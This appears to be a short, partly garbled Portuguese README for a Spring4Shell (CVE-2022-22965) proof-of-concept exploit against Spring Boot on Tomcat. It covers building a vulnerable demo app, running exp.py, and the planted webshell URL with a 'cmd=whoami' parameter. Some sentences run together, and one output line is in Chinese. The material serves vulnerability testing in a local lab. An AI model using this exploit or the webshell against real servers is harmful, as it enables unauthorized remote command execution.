
Exploit de prova de conceito para Spring4Shell (CVE-2022-22965) que implanta um webshell JSP através de requisições HTTP elaboradas para aplicações Spring Boot vulneráveis no Apache Tomcat.
Descrição da vulnerabilidade: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
Construção do POC: https://github.com/BobTheShoplifter/Spring4Shell-POC
Testado com JDK 11.0.14, Spring Boot 2.6.5 e Apache Tomcat 9.0.60
mvn clean package para compilar a aplicaçãodemo-0.0.1-SNAPSHOT.war para spring-poc.war e copie este arquivo .war para o diretório webapps do Tomcatpython exp.py --url http://localhost:8080/spring-poc/greeting
漏洞存在,shell地址为:http://localhost:8080/spring-poc/tomcatwar.jsp?pwd=j&cmd=whoami será registrada.tomcatwar.jsp escrito no diretório webapps/spring-poc do Tomcat. Este diretório pode ser alterado modificando exp.py.

